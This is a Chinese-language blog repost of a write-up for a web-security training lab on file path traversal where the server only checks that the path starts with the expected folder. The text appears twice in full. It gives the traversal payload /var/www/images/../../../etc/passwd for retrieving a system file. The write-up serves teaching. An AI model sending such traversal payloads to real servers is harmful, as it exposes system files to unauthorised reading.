USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > 业界 > Lab: File path traversal, validation of start of path:文件路径遍历,起始路径验证

    Lab: File path traversal, validation of start of path:文件路径遍历,起始路径验证

    业界 admin 2浏览 0评论

    靶场内容:

    本实验室在产品图片显示中存在文件路径遍历漏洞。

    应用程序通过请求参数传输完整的文件路径,并验证提供的路径是否以预期的文件夹开头。

    要解决实验室问题,请检索/etc/passwd文件的内容。

    漏洞分析

    • 打开图片链接,可以看到,图片后面跟上了绝对路径:https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy/image?filename=/var/www/images/29.jpg
    • /var和/etc一样属于一级目录
    • 这个漏洞在于,它不允许相对路径的遍历,只允许绝对路径的遍历
    • 所以我们只需要在后面加上…/…/…/etc/passwd即可
    • https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy/image?filename=/var/www/images/../../../etc/passwd

    关键截图:

    靶场内容:

    本实验室在产品图片显示中存在文件路径遍历漏洞。

    应用程序通过请求参数传输完整的文件路径,并验证提供的路径是否以预期的文件夹开头。

    要解决实验室问题,请检索/etc/passwd文件的内容。

    漏洞分析

    • 打开图片链接,可以看到,图片后面跟上了绝对路径:https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy/image?filename=/var/www/images/29.jpg
    • /var和/etc一样属于一级目录
    • 这个漏洞在于,它不允许相对路径的遍历,只允许绝对路径的遍历
    • 所以我们只需要在后面加上…/…/…/etc/passwd即可
    • https://ac311fd21e5ffcf482b23580000d00a5.web-security-academy/image?filename=/var/www/images/../../../etc/passwd

    关键截图:

    继续浏览有关 的文章

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论